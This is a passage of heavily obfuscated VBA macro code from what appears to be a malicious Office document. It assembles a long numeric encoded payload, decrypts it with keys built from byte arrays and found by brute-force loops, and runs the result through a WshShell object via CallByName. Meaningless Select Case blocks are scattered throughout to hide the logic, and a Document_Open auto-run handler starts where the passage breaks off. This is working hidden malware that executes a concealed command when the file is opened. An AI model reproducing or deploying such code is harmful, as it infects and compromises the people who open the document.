JzvPy = JzvPy & "E28930E-6059E115E-24934E-17086E-6851E-30110E23147E24119E3470E-1656E-18016E-6457E-20020E-30124E28140E-21839E-7857E-12104E-5197E13429E32758E518E2729E-6219E-23057E17635E23501E2133E26642E-11049E-2132E-32078E-19464E-6405E3872E-14384E10395E4467E-27259E-4285E22246E14204E7886E32433E32233E-1081E7343E-26828E-28752E7081E-10011E24808E27881E-10266E28908E26788E-28825E-1788E-25650E29614E-15497E-28068E24037E6905E27946E32702E-32105E-12079E31335E-30904E28188E31699E-16838E660E-14719E10442E18400E7062E-27744E27423E-2584E4695E16601E18844E-7517E-9211E-21590E-10368E10387E-19815E-15591E-4467E28200E11319E-31992E-31791E-9952E22162E27829E-9027E-8396E-25969E-10203E32286E-22876E-18860E27101E-11415E-28794E20102E5705E-12975E-10702E22200E-12412E21836E-23025E-30707E29067E32696E27684E-20512E5503E1537E-12470E1"
K9LK7 = 93
Select Case K9LK7
Case 48
K9LK7 = K9LK7 + 1
Case 13
K9LK7 = K9LK7 + K9LK7
Case Else
K9LK7 = K9LK7 - 1
End Select
JzvPy = JzvPy & "42E-9944E-27244E11679E16313E-16741E15502E5638E-16392E-17844E-30066E20858E869E-23338E-7025E-7558E1414E10212E-3191E-4318E-6904E-18363E29028E8449E32185E-29888E12151E-19826E19418E-16197E10889E-24060E-29135E23524E7661E17260E-14260E18228E-26338E-9026E22021E-1607E30901E5862E-4525E18019E-17905E-19822E30898E10276E14522E4094E-5047E-11846E31356E1834E-18755E-30505E842E-27874E-21785E17856E9281E2341E-14033E6648E9601E-22849E24030E21100E18439E3245E13045E-31322E-17162E26945E-21231E29539E-11101E-9562E-12469E6900E3687E-17622E-4163E26526E29772E-6052E-13804E-9607E17111E-27010E21875E29603E20669E24682E-19677E18350E30163E8024E-7850E-3363E1232E-11793E-23549E18259E-3105E-19470E-18144E9839E14438E11783E14995E25580E-24593E18622E-8750E2522E17785E5935E-2934E-4077E24189E22540E20796E29961E-26836E29076E-2471"
XC = 5
Select Case XC
Case 16
XC = XC + 1
Case 9
XC = XC + XC
Case Else
XC = XC - 1
End Select
JzvPy = JzvPy & "7E1461E-7592E-16250E17527E23931E27714E2817E-24136E-25173E5942E13642E-5482E23612E26559E27216E14285E-31314E-6450E56E-20556E30630E-20334E20651E21043E-19738E-19352E17416E-19132E28261E15338E-7448E27474E32304E-10738E-21196E12666E-14144E-23525E17983E23653E-4068E12561E10282E-8269E21193E895E7280E8605E-32730E6423E10556E26574E-3122E-4234E-23995E29635E22621E24718E-13652E2364E13734E18093E12771E-26611E-22597E23815E-21949E19106E-21814E-7641E-5923E12542E-27417E-25759E-3792E10710E19594E-12534E-27938E14512E-25689E-4275E-12335E-12952E9219E19133E4462E20088E7187E14544E6627E-3559E-9881E17999E10370E1036E17058E22553E-27833E-7036E1426E-9491E9140E-25619E26016E9711E14453E-21804E23566E-13610E12686E21257E15577E-20463E-28434E17096E3201E28997E20969E-6468E-24213E22582E25630E23380E-21214E22675E-22496E-18932"
KVB3C = 50
Select Case KVB3C
Case 91
KVB3C = KVB3C + 1
Case 94
KVB3C = KVB3C + KVB3C
Case Else
KVB3C = KVB3C - 1
End Select
JzvPy = JzvPy & "E25599E-25850E-13349E8317E-17468E12039E-4743E-24152E2678E-6907E30360E14486E21884E-17700E-12024E17469E16793E20275E-18109E25122E6275E16706E-1582E-6390E-6839E-12223E-29010E28125E22490E-16591E-14848E-852E1207E-10577E4915E-30703E-19518E-5172E18208E-2291E-10667E-16292E-14104E12342E-30548E-1743E6384E29084E-19204E22643E2302E19930E12888E31268E-6105E12380E-32242E186E-1116E-21541E6930E15970E12349E-9627E14509E6527E19926E-7479E11641E17131E-14933E23549E-28240E20736E2180E-3949E-25569E5488E-12527E29856E-14492E3672E-12235E-26835E-1276E24805E26619E30807E-2379E-21960E2920E6508E21504E-26946E11084E21953E28511E-13824E29507E12445E9826E-26522E-4833E-32751E21885E13178E22265E-16790E-22291E-2393E3786E-11447E-19358E-16900E-30437E29484E10286E24802E30490E25721E-28068E-7526E-5684E-11051E-10518E-18390E-178"
Jh = 98
Select Case Jh
Case 96
Jh = Jh + 1
Case 6
Jh = Jh + Jh
Case Else
Jh = Jh - 1
End Select
JzvPy = JzvPy & "83E-14953E-16773E12681E-24311E-29037E-31798E-13731E-3535E7917E-3625E28647E28550E-15795E-1406E20822E-17423E-32702E7315E18748E-18735E1801E-2291E-9972E26967E-16178E7803E-19567E-19498E26334E-6746E26024E-14716E11232E5410E-9313E-4645E4309E23411E8895E21997E-3296E-20237E-11938E5173E-3001E-4942E12287E11297E20507E-25471E18376E24235E22972E-7671E7337E-23731E-29822E15902E32202E26618E-10555E30745E26262E26322E-17445E-31504E32073E-30034E25848E-5030E-9267E-25862E30047E-19191E26143E-1241E26482E8570E-20084E13054E17013E32012E-16556E125E-29891E26998E-12972E18687E14567E-18037E-26836E-9276E2236E30718E-17141E11049E-4824E578E15352E27945E-21967E13365E-6474E-26025E-2626E13178E14155E-17183E-7024E-25673E-1134E-27565E2635E26682E-11979E-2534E8816E-13650E20669E-13994E27096E-25282E10547E11492E-19208E-12929E"
LDQ = 57
Select Case LDQ
Case 63
LDQ = LDQ + 1
Case 47
LDQ = LDQ + LDQ
Case Else
LDQ = LDQ - 1
End Select
JzvPy = JzvPy & "17600E19685E-9390E-20821E-8421E12033E13115E-13747E-14687E-5574E-28437E-2029E-5916E-30907E-24924E8126E-2559E-10505E10035E-28338E-20226E-11557E5427E-13821E21385E24209E4396E18069E32384E-2401E883E-25231E-5944E-26470E13160E32682E-13356E5356E-14802E10628E5392E31122E14440E31766E-26603E-28353E-23041E-7520E-26235E3182E-5942E-23445E-9303E25720E28889E22164E-23130E27832E-21407E-18427E6943E-27447E13133E14681E18540E26942E-28037E19495E-6846E4047E-22710E-19230E13895E4448E-18229E17832E19169E25236E13988E13480E-12979E-660E12631E-9806E-32265E-7312E-901E11825E-29926E382E-32339E-30231E-4269E5862E3461E-27207E23321E28506E-22606E21834E-5245E-1604E24797E-27841E3323E7676E-29664E-20829E16295E30275E-19256E-7010E-409E-5022E11927E4239E-718E4717E-2916E9913E-2711E-1675E19015E-15705E-31601E1963E-14891E-29772"
A8R = 75
Select Case A8R
Case 57
A8R = A8R + 1
Case 83
A8R = A8R + A8R
Case Else
A8R = A8R - 1
End Select
JzvPy = JzvPy & "E13863E-22408E-17044E14140E32418E16651E-32747E-28434E5182E-21258E32290E32010E-5826E-13722E-28916E-19662E8803E-15198E-16686E-5112E-28993E-17892E-21278E30480E11079E21665E29836E5189E-16213E14612E-11955E3954E-11280E-4707E19337E-28788E17859E-12945E-24905E18800E-18812E-15945E7868E-25117E6972E-9364E-17238E-24553E-7685E4282E19445E3163E20685E-23974E19311E15591E11172E-15498E-10974E20469E-26805E-5259E-5796E-7979E8079E-5919E-8026E1769E26888E-8947E18377E-27478E3988E-3754E-4352E28401E-26865E3624E17470E-12569E-27939E22745E31130E-29501E28612E22088E14237E10738E-17288E3848E21479E5049E-20712E-11496E13830E16474E9946E-29634E-5636E-25692E37E-25669E19353E-31511E12981E4366E4899E-8799E1971E3683E-11728E-28287E-23314E-6201E-1192E32021E29127E-9518E17711E-9284E28056E17513E-24583E-30219E-24550E-20351E-30"
QGvk = 22
Select Case QGvk
Case 30
QGvk = QGvk + 1
Case 79
QGvk = QGvk + QGvk
Case Else
QGvk = QGvk - 1
End Select
JzvPy = JzvPy & "387E26859E6296E-8086E20636E-3627E14E28927E-25089E12955E7594E19304E26132E1747E-13167E12199E7182E2087E-29643E-12968E-5008E20897E22332E-11935E-19927E-29244E-26169E-29711E31133E985E-27290E-15029E16214E-9222E-7832E17578E-15002E-25948E13706E3876E-27158E-10919E25538E-13124E13751E22973E18149E30728E-22533E-14512E17866E-21201E-14242E31536E23435E-2038E-21826E31355E-1231E15357E2214E18068E-24870E3719E-8265E64E-19576E20779E-32756E20902E-13011E-24339E18908E-16820E-5924E24935E9322E-9508E24016E19702E4474E16088E-13727E20120E3401E15915E29904E-23198E-29749E-18925E15083E-19082E-29467E-4152E-10194E-28708E-25764E14829E2501E-4202E30215E3256E-28041E-20152E25886E-677E5170E-18022E25388E13240E1262E-4843E-4412E4370E-13824E-31960E27047E23620E20957E5229E-5746E-29806E-25528E30467E-18481E9774E22766E-24218E1"
XqKpNk1 = 34
Select Case XqKpNk1
Case 66
XqKpNk1 = XqKpNk1 + 1
Case 94
XqKpNk1 = XqKpNk1 + XqKpNk1
Case Else
XqKpNk1 = XqKpNk1 - 1
End Select
JzvPy = JzvPy & "84E-2485E6120E-1249E-17231E19284E-24594E-14718E-8785E7112E-22190E14069E8793E-17687E7061E-10821E-17356E-28147E-19172E6000E-23795E-24546E5583E-25895E-4227E9547E7271E8420E-32137E-24358E30574E-9209E-27212E25662E25610E13936E-23265E20380E23395E24835E-4707E6458E-30534E-3065E14897E-26313E5608E-15434E-21141E-2547E-30269E22951E13112E-19913E7840E-7194E-28104E28248E-16143E-25933E8097E-5487E-15250E1747E28311E13798E5426E-15765E-31405E-17544E25761E-2159E12661E25491E-27417E12992E-30696E-27746E21320E-4736E920E-22794E8523E-7520E-19936E-14006E14834E32036E31257E-27067E5695E-27904E11354E-9582E-18812E20507E-28975E-31575E-8997E-5287E-19594E-24715E-20872E-25720E-3871E-23133E-8047E-12268E20099E-22421E-29982E-12157E-29203E-29423E5901E24742E6114E11382E9915E-20639E-29861E-25353E24275E123E25378E-10903E-"
P4S = 23
Select Case P4S
Case 38
P4S = P4S + 1
Case 18
P4S = P4S + P4S
Case Else
P4S = P4S - 1
End Select
JzvPy = JzvPy & "9775E32117E-12698E-31751E-26088E-26084E22384E11258E-18068E-4650E2685E18364E367E-13816E-3901E21900E22798E28462E22633E25686E10643E-32707E23988E17180E-12114E12867E-32385E-26614E-784E-5312E-7506E10610E-14340E-13777E28639E25509E-21733E-15437E8584E-6889E20043E4254E-7889E-26317E24616E27178E19243E3615E-31365E-11590E11625E-6463E-17689E7322E-20856E13777E10935E-13564E6637E24919E-21025E-9240E21526E25265E23695E-18234E-11009E-23812E-10724E-9449E-31292E-25620E31769E-11440E29974E-24569E-10473E-10539E25961E-10524E22094E-5108E27011E20898E-29870E-19980E29883E-30212E13871E18436E11653E21884E15907E11082E22162E27516E10940E2822E-4403E-12843E23849E-10297E-235E-3537E24524E-18737E-15620E11707E-3298E21463E-32637E24441E9604E-30655E17157E21268E-29546E20362E28303E-16739E15516E-25715E21024E6155E24776E1217E"
B1rplt = 38
Select Case B1rplt
Case 93
B1rplt = B1rplt + 1
Case 53
B1rplt = B1rplt + B1rplt
Case Else
B1rplt = B1rplt - 1
End Select
JzvPy = JzvPy & "7624"
DKSR1c0 = 7
Select Case DKSR1c0
Case 27
DKSR1c0 = DKSR1c0 + 1
Case 66
DKSR1c0 = DKSR1c0 + DKSR1c0
Case Else
DKSR1c0 = DKSR1c0 - 1
End Select
Dim VYt() As String, FJ3F As Integer
KROvMPt = 21
Select Case KROvMPt
Case 58
KROvMPt = KROvMPt + 1
Case 18
KROvMPt = KROvMPt + KROvMPt
Case Else
KROvMPt = KROvMPt - 1
End Select
VYt = Split(JzvPy, Ku((197064 / 2856)))
PQ = 65
Select Case PQ
Case 34
PQ = PQ + 1
Case 55
PQ = PQ + PQ
Case Else
PQ = PQ - 1
End Select
ReDim CVi64(2033)
Vc1USA = 53
Select Case Vc1USA
Case 97
Vc1USA = Vc1USA + 1
Case 39
Vc1USA = Vc1USA + Vc1USA
Case Else
Vc1USA = Vc1USA - 1
End Select
For FJ3F = 0 To 2033
CVi64(FJ3F) = VYt(FJ3F)
Next FJ3F
Dim PAd As String, LI6 As Long, JVNKOO6 As String, YRED As String, FBV As String, OQGN5z As String, TaM99 As String, VYyj As String, X0x() As Byte
Ugx8 = 91
Select Case Ugx8
Case 70
Ugx8 = Ugx8 + 1
Case 32
Ugx8 = Ugx8 + Ugx8
Case Else
Ugx8 = Ugx8 - 1
End Select
Pog7 = 8
Select Case Pog7
Case 9
Pog7 = Pog7 + 1
Case 5
Pog7 = Pog7 + Pog7
Case Else
Pog7 = Pog7 - 1
End Select
Dim SiEwFVs(10) As Byte, G9GxP(32) As Byte
Ue1cIr = 38
Select Case Ue1cIr
Case 43
Ue1cIr = Ue1cIr + 1
Case 27
Ue1cIr = Ue1cIr + Ue1cIr
Case Else
Ue1cIr = Ue1cIr - 1
End Select
SiEwFVs(0) = 247
SiEwFVs(1) = 73
SiEwFVs(2) = 209
SiEwFVs(3) = 177
SiEwFVs(4) = 19
SiEwFVs(5) = 41
SiEwFVs(6) = 26
SiEwFVs(7) = 254
SiEwFVs(8) = 144
SiEwFVs(9) = 25
SiEwFVs(10) = 206
E5W2 = 44
Select Case E5W2
Case 64
E5W2 = E5W2 + 1
Case 4
E5W2 = E5W2 + E5W2
Case Else
E5W2 = E5W2 - 1
End Select
G9GxP(0) = 79
G9GxP(1) = 109
G9GxP(2) = 66
G9GxP(3) = 82
G9GxP(4) = 88
G9GxP(5) = 57
G9GxP(6) = 101
G9GxP(7) = 70
G9GxP(8) = 57
G9GxP(9) = 89
G9GxP(10) = 76
G9GxP(11) = 78
G9GxP(12) = 89
W2An6SC = 37
Select Case W2An6SC
Case 58
W2An6SC = W2An6SC + 1
Case 47
W2An6SC = W2An6SC + W2An6SC
Case Else
W2An6SC = W2An6SC - 1
End Select
For LI6 = UC(A1K) To UC(VrYp9)
G9GxP(13) = S2o2oc(LI6, 1)
G9GxP(14) = S2o2oc(LI6, 2)
G9GxP(15) = S2o2oc(LI6, 3)
G9GxP(16) = S2o2oc(LI6, 4)
G9GxP(17) = G9GxP(13)
G9GxP(18) = G9GxP(14)
G9GxP(19) = G9GxP(15)
G9GxP(20) = G9GxP(16)
G9GxP(21) = G9GxP(13)
G9GxP(22) = G9GxP(14)
G9GxP(23) = G9GxP(15)
G9GxP(24) = G9GxP(16)
G9GxP(25) = G9GxP(13)
G9GxP(26) = G9GxP(14)
G9GxP(27) = G9GxP(15)
G9GxP(28) = G9GxP(16)
G9GxP(29) = G9GxP(13)
G9GxP(30) = G9GxP(14)
G9GxP(31) = G9GxP(15)
G9GxP(32) = G9GxP(16)
If QQ8WF3e(SiEwFVs, G9GxP) = "C31KzgcbQBl" Then Exit For
Next LI6
NPgKr5O = 65
Select Case NPgKr5O
Case 11
NPgKr5O = NPgKr5O + 1
Case 74
NPgKr5O = NPgKr5O + NPgKr5O
Case Else
NPgKr5O = NPgKr5O - 1
End Select
Dim PCdDl(15) As Byte, RyCMYK(28) As Byte
VYuFS = 50
Select Case VYuFS
Case 59
VYuFS = VYuFS + 1
Case 31
VYuFS = VYuFS + VYuFS
Case Else
VYuFS = VYuFS - 1
End Select
PCdDl(0) = 94
PCdDl(1) = 179
PCdDl(2) = 250
PCdDl(3) = 239
PCdDl(4) = 38
PCdDl(5) = 145
PCdDl(6) = 63
PCdDl(7) = 127
PCdDl(8) = 0
PCdDl(9) = 208
PCdDl(10) = 199
PCdDl(11) = 103
PCdDl(12) = 179
PCdDl(13) = 220
PCdDl(14) = 71
PCdDl(15) = 81
RUgm90m = 36
Select Case RUgm90m
Case 41
RUgm90m = RUgm90m + 1
Case 25
RUgm90m = RUgm90m + RUgm90m
Case Else
RUgm90m = RUgm90m - 1
End Select
RyCMYK(0) = 87
RyCMYK(1) = 118
RyCMYK(2) = 80
RyCMYK(3) = 66
RyCMYK(4) = 80
RyCMYK(5) = 69
RyCMYK(6) = 110
RyCMYK(7) = 51
RyCMYK(8) = 73
TQRgKnq = 92
Select Case TQRgKnq
Case 88
TQRgKnq = TQRgKnq + 1
Case 54
TQRgKnq = TQRgKnq + TQRgKnq
Case Else
TQRgKnq = TQRgKnq - 1
End Select
For LI6 = UC(A1K) To UC(VrYp9)
RyCMYK(9) = S2o2oc(LI6, 1)
RyCMYK(10) = S2o2oc(LI6, 2)
RyCMYK(11) = S2o2oc(LI6, 3)
RyCMYK(12) = S2o2oc(LI6, 4)
RyCMYK(13) = RyCMYK(9)
RyCMYK(14) = RyCMYK(10)
RyCMYK(15) = RyCMYK(11)
RyCMYK(16) = RyCMYK(12)
RyCMYK(17) = RyCMYK(9)
RyCMYK(18) = RyCMYK(10)
RyCMYK(19) = RyCMYK(11)
RyCMYK(20) = RyCMYK(12)
RyCMYK(21) = RyCMYK(9)
RyCMYK(22) = RyCMYK(10)
RyCMYK(23) = RyCMYK(11)
RyCMYK(24) = RyCMYK(12)
RyCMYK(25) = RyCMYK(9)
RyCMYK(26) = RyCMYK(10)
RyCMYK(27) = RyCMYK(11)
RyCMYK(28) = RyCMYK(12)
If QQ8WF3e(PCdDl, RyCMYK) = "XxwveAdjOW0Uyom8" Then Exit For
Next LI6
TevLH77 = 93
Select Case TevLH77
Case 27
TevLH77 = TevLH77 + 1
Case 8
TevLH77 = TevLH77 + TevLH77
Case Else
TevLH77 = TevLH77 - 1
End Select
Dim WxQU(15) As Byte, PMVq0kj(37) As Byte
BsVL1 = 79
Select Case BsVL1
Case 23
BsVL1 = BsVL1 + 1
Case 65
BsVL1 = BsVL1 + BsVL1
Case Else
BsVL1 = BsVL1 - 1
End Select
WxQU(0) = 124
WxQU(1) = 106
WxQU(2) = 179
WxQU(3) = 123
WxQU(4) = 94
WxQU(5) = 37
WxQU(6) = 135
WxQU(7) = 71
WxQU(8) = 52
WxQU(9) = 53
WxQU(10) = 138
WxQU(11) = 201
WxQU(12) = 117
WxQU(13) = 158
WxQU(14) = 218
WxQU(15) = 122
EJKssY = 29
Select Case EJKssY
Case 58
EJKssY = EJKssY + 1
Case 72
EJKssY = EJKssY + EJKssY
Case Else
EJKssY = EJKssY - 1
End Select
PMVq0kj(0) = 88
PMVq0kj(1) = 69
PMVq0kj(2) = 102
PMVq0kj(3) = 68
PMVq0kj(4) = 56
PMVq0kj(5) = 65
PMVq0kj(6) = 78
PMVq0kj(7) = 87
PMVq0kj(8) = 84
PMVq0kj(9) = 100
PMVq0kj(10) = 100
PMVq0kj(11) = 82
PMVq0kj(12) = 122
PMVq0kj(13) = 76
PMVq0kj(14) = 77
PMVq0kj(15) = 55
PMVq0kj(16) = 71
PMVq0kj(17) = 90
AbgjlI9 = 48
Select Case AbgjlI9
Case 28
AbgjlI9 = AbgjlI9 + 1
Case 88
AbgjlI9 = AbgjlI9 + AbgjlI9
Case Else
AbgjlI9 = AbgjlI9 - 1
End Select
For LI6 = UC(A1K) To UC(VrYp9)
PMVq0kj(18) = S2o2oc(LI6, 1)
PMVq0kj(19) = S2o2oc(LI6, 2)
PMVq0kj(20) = S2o2oc(LI6, 3)
PMVq0kj(21) = S2o2oc(LI6, 4)
PMVq0kj(22) = PMVq0kj(18)
PMVq0kj(23) = PMVq0kj(19)
PMVq0kj(24) = PMVq0kj(20)
PMVq0kj(25) = PMVq0kj(21)
PMVq0kj(26) = PMVq0kj(18)
PMVq0kj(27) = PMVq0kj(19)
PMVq0kj(28) = PMVq0kj(20)
PMVq0kj(29) = PMVq0kj(21)
PMVq0kj(30) = PMVq0kj(18)
PMVq0kj(31) = PMVq0kj(19)
PMVq0kj(32) = PMVq0kj(20)
PMVq0kj(33) = PMVq0kj(21)
PMVq0kj(34) = PMVq0kj(18)
PMVq0kj(35) = PMVq0kj(19)
PMVq0kj(36) = PMVq0kj(20)
PMVq0kj(37) = PMVq0kj(21)
If QQ8WF3e(WxQU, PMVq0kj) = "ABHnYU6B0TlVKiwL" Then Exit For
Next LI6
TWZ = 77
Select Case TWZ
Case 26
TWZ = TWZ + 1
Case 55
TWZ = TWZ + TWZ
Case Else
TWZ = TWZ - 1
End Select
Dim QwfmSb(13) As Byte, O0am(31) As Byte
QT6li = 72
Select Case QT6li
Case 41
QT6li = QT6li + 1
Case 7
QT6li = QT6li + QT6li
Case Else
QT6li = QT6li - 1
End Select
QwfmSb(0) = 127
QwfmSb(1) = 24
QwfmSb(2) = 53
QwfmSb(3) = 226
QwfmSb(4) = 177
QwfmSb(5) = 35
QwfmSb(6) = 227
QwfmSb(7) = 24
QwfmSb(8) = 47
QwfmSb(9) = 249
QwfmSb(10) = 149
QwfmSb(11) = 23
QwfmSb(12) = 249
QwfmSb(13) = 241
OHdEb = 30
Select Case OHdEb
Case 26
OHdEb = OHdEb + 1
Case 91
OHdEb = OHdEb + OHdEb
Case Else
OHdEb = OHdEb - 1
End Select
O0am(0) = 88
O0am(1) = 74
O0am(2) = 87
O0am(3) = 115
O0am(4) = 78
O0am(5) = 121
O0am(6) = 109
O0am(7) = 86
O0am(8) = 72
O0am(9) = 78
O0am(10) = 69
O0am(11) = 115
O7fGaV = 66
Select Case O7fGaV
Case 19
O7fGaV = O7fGaV + 1
Case 61
O7fGaV = O7fGaV + O7fGaV
Case Else
O7fGaV = O7fGaV - 1
End Select
For LI6 = UC(A1K) To UC(VrYp9)
O0am(12) = S2o2oc(LI6, 1)
O0am(13) = S2o2oc(LI6, 2)
O0am(14) = S2o2oc(LI6, 3)
O0am(15) = S2o2oc(LI6, 4)
O0am(16) = O0am(12)
O0am(17) = O0am(13)
O0am(18) = O0am(14)
O0am(19) = O0am(15)
O0am(20) = O0am(12)
O0am(21) = O0am(13)
O0am(22) = O0am(14)
O0am(23) = O0am(15)
O0am(24) = O0am(12)
O0am(25) = O0am(13)
O0am(26) = O0am(14)
O0am(27) = O0am(15)
O0am(28) = O0am(12)
O0am(29) = O0am(13)
O0am(30) = O0am(14)
O0am(31) = O0am(15)
If QQ8WF3e(QwfmSb, O0am) = "TWLAYPOWcmP4lQ" Then Exit For
Next LI6
GRkeC = 51
Select Case GRkeC
Case 28
GRkeC = GRkeC + 1
Case 46
GRkeC = GRkeC + GRkeC
Case Else
GRkeC = GRkeC - 1
End Select
D3m = 89
Select Case D3m
Case 2
D3m = D3m + 1
Case 38
D3m = D3m + D3m
Case Else
D3m = D3m - 1
End Select
Dim TcScm As Long, EBQacLP As Long, CRN0vA As Long, Afpr9 As Long, AphUNbG(4072) As Byte, IQb9 As Long, QYzN7NX As String
Fl = 15
Select Case Fl
Case 25
Fl = Fl + 1
Case 95
Fl = Fl + Fl
Case Else
Fl = Fl - 1
End Select
For TcScm = 0 To UC(CVi64)
SMb6 = 65
Select Case SMb6
Case 13
SMb6 = SMb6 + 1
Case 42
SMb6 = SMb6 + SMb6
Case Else
SMb6 = SMb6 - 1
End Select
For EBQacLP = 1 To 2
AiTzRhz = 42
Select Case AiTzRhz
Case 68
AiTzRhz = AiTzRhz + 1
Case 17
AiTzRhz = AiTzRhz + AiTzRhz
Case Else
AiTzRhz = AiTzRhz - 1
End Select
If CRN0vA = 1 Then
MHl5Q = 33
Select Case MHl5Q
Case 93
MHl5Q = MHl5Q + 1
Case 40
MHl5Q = MHl5Q + MHl5Q
Case Else
MHl5Q = MHl5Q - 1
End Select
AphUNbG(Afpr9) = ATmQ(CVi64(IQb9))(CRN0vA)
WU = 8
Select Case WU
Case 11
WU = WU + 1
Case 29
WU = WU + WU
Case Else
WU = WU - 1
End Select
Else
BJyBtoN = 39
Select Case BJyBtoN
Case 16
BJyBtoN = BJyBtoN + 1
Case 34
BJyBtoN = BJyBtoN + BJyBtoN
Case Else
BJyBtoN = BJyBtoN - 1
End Select
CRN0vA = 0
N2 = 80
Select Case N2
Case 51
N2 = N2 + 1
Case 64
N2 = N2 + N2
Case Else
N2 = N2 - 1
End Select
AphUNbG(Afpr9) = ATmQ(CVi64(IQb9))(CRN0vA)
F5PQ4x = 70
Select Case F5PQ4x
Case 19
F5PQ4x = F5PQ4x + 1
Case 74
F5PQ4x = F5PQ4x + F5PQ4x
Case Else
F5PQ4x = F5PQ4x - 1
End Select
End If
Etg6aKD = 65
Select Case Etg6aKD
Case 35
Etg6aKD = Etg6aKD + 1
Case 5
Etg6aKD = Etg6aKD + Etg6aKD
Case Else
Etg6aKD = Etg6aKD - 1
End Select
Afpr9 = Afpr9 + 1
BZjMo = 47
Select Case BZjMo
Case 2
BZjMo = BZjMo + 1
Case 39
BZjMo = BZjMo + BZjMo
Case Else
BZjMo = BZjMo - 1
End Select
CRN0vA = CRN0vA + 1
G7 = 62
Select Case G7
Case 84
G7 = G7 + 1
Case 17
G7 = G7 + G7
Case Else
G7 = G7 - 1
End Select
Next EBQacLP
PRH = 54
Select Case PRH
Case 47
PRH = PRH + 1
Case 69
PRH = PRH + PRH
Case Else
PRH = PRH - 1
End Select
IQb9 = IQb9 + 1
GFo = 60
Select Case GFo
Case 88
GFo = GFo + 1
Case 30
GFo = GFo + GFo
Case Else
GFo = GFo - 1
End Select
Next TcScm
KIHfSMH = 26
Select Case KIHfSMH
Case 63
KIHfSMH = KIHfSMH + 1
Case 78
KIHfSMH = KIHfSMH + KIHfSMH
Case Else
KIHfSMH = KIHfSMH - 1
End Select
Dim G4vrGKV(131) As Byte, D1mkl As Long, GFn As Long
VSmw = 8
Select Case VSmw
Case 59
VSmw = VSmw + 1
Case 31
VSmw = VSmw + VSmw
Case Else
VSmw = VSmw - 1
End Select
D1mkl = 0
B25 = 53
Select Case B25
Case 23
B25 = B25 + 1
Case 87
B25 = B25 + B25
Case Else
B25 = B25 - 1
End Select
GFn = 0
VSLqm = 7
Select Case VSLqm
Case 67
VSLqm = VSLqm + 1
Case 92
VSLqm = VSLqm + VSLqm
Case Else
VSLqm = VSLqm - 1
End Select
For LI6 = 0 To UC(G9GxP)
G4vrGKV(LI6) = G9GxP(LI6)
D1mkl = D1mkl + 1
Next LI6
Q2 = 48
Select Case Q2
Case 36
Q2 = Q2 + 1
Case 71
Q2 = Q2 + Q2
Case Else
Q2 = Q2 - 1
End Select
For LI6 = UC(G9GxP) + 1 To UC(RyCMYK) + D1mkl
G4vrGKV(LI6) = RyCMYK(GFn)
GFn = GFn + 1
D1mkl = D1mkl + 1
Next LI6
B3BAOZ4 = 35
Select Case B3BAOZ4
Case 53
B3BAOZ4 = B3BAOZ4 + 1
Case 72
B3BAOZ4 = B3BAOZ4 + B3BAOZ4
Case Else
B3BAOZ4 = B3BAOZ4 - 1
End Select
GFn = 0
ETT7 = 75
Select Case ETT7
Case 92
ETT7 = ETT7 + 1
Case 93
ETT7 = ETT7 + ETT7
Case Else
ETT7 = ETT7 - 1
End Select
For LI6 = D1mkl To UC(PMVq0kj) + D1mkl
G4vrGKV(LI6) = PMVq0kj(GFn)
GFn = GFn + 1
D1mkl = D1mkl + 1
Next LI6
WWQWxzW = 94
Select Case WWQWxzW
Case 74
WWQWxzW = WWQWxzW + 1
Case 80
WWQWxzW = WWQWxzW + WWQWxzW
Case Else
WWQWxzW = WWQWxzW - 1
End Select
GFn = 0
JXBDtOU = 1
Select Case JXBDtOU
Case 28
JXBDtOU = JXBDtOU + 1
Case 47
JXBDtOU = JXBDtOU + JXBDtOU
Case Else
JXBDtOU = JXBDtOU - 1
End Select
For LI6 = D1mkl To UC(O0am) + D1mkl
G4vrGKV(LI6) = O0am(GFn)
GFn = GFn + 1
D1mkl = D1mkl + 1
Next LI6
DXWz = 13
Select Case DXWz
Case 57
DXWz = DXWz + 1
Case 98
DXWz = DXWz + DXWz
Case Else
DXWz = DXWz - 1
End Select
X0x = AphUNbG
Uk = 56
Select Case Uk
Case 74
Uk = Uk + 1
Case 20
Uk = Uk + Uk
Case Else
Uk = Uk - 1
End Select
ReDim Preserve X0x(4067)
DJY = 25
Select Case DJY
Case 55
DJY = DJY + 1
Case 18
DJY = DJY + DJY
Case Else
DJY = DJY - 1
End Select
QYzN7NX = QQ8WF3e(X0x, G4vrGKV)
AXuZ = 96
Select Case AXuZ
Case 6
AXuZ = AXuZ + 1
Case 77
AXuZ = AXuZ + AXuZ
Case Else
AXuZ = AXuZ - 1
End Select
Omt9X = 82
Select Case Omt9X
Case 95
Omt9X = Omt9X + 1
Case 9
Omt9X = Omt9X + Omt9X
Case Else
Omt9X = Omt9X - 1
End Select
A8Rr = 83
Select Case A8Rr
Case 4
A8Rr = A8Rr + 1
Case 70
A8Rr = A8Rr + A8Rr
Case Else
A8Rr = A8Rr - 1
End Select
Dim EZLnK As New WshShell
Ksb = 98
Select Case Ksb
Case 23
Ksb = Ksb + 1
Case 50
Ksb = Ksb + Ksb
Case Else
Ksb = Ksb - 1
End Select
Dim KUEp(2) As Byte, BnRsr(8) As Byte
NTmf = 80
Select Case NTmf
Case 53
NTmf = NTmf + 1
Case 61
NTmf = NTmf + NTmf
Case Else
NTmf = NTmf - 1
End Select
KUEp(0) = 143
KUEp(1) = 93
KUEp(2) = 84
TgvZkEM = 91
Select Case TgvZkEM
Case 4
TgvZkEM = TgvZkEM + 1
Case 95
TgvZkEM = TgvZkEM + TgvZkEM
Case Else
TgvZkEM = TgvZkEM - 1
End Select
BnRsr(0) = 82
BnRsr(1) = 65
BnRsr(2) = 65
BnRsr(3) = 79
BnRsr(4) = 104
BnRsr(5) = 107
BnRsr(6) = 117
BnRsr(7) = 88
BnRsr(8) = 106
CallByName EZLnK, QQ8WF3e(KUEp, BnRsr), 8386 - 8385, QYzN7NX, 8853 - 8853, 416 - 416
BI = 63
Select Case BI
Case 54
BI = BI + 1
Case 55
BI = BI + BI
Case Else
BI = BI - 1
End Select
End Sub
Private Sub dOcUmENt_OpeN()
AmlD8K = 6
Select Case AmlD8K
Case 46
AmlD8K = AmlD8K + 1
Case 71
AmlD8K = AmlD8K + AmlD8K
Case Else
AmlD8K = AmlD8K - 1
End Select
On Error Resume Next
NJZuEB = 78
Select Case NJZuEB
Case 28
NJZuEB = NJZuEB + 1
Case 78
NJZuEB = NJZuEB + NJZuEB
Case Else
NJZuEB = NJZuEB - 1
End Select
Dim EHHFr9o As Long, CVOz As Long, GD291xs As Long
F6LfA9 = 88
Select Case F6LfA9
Case 9
F6LfA9 = F6LfA9 + 1
Case 21
F6LfA9 = F6LfA9 + F6LfA9
Case Else
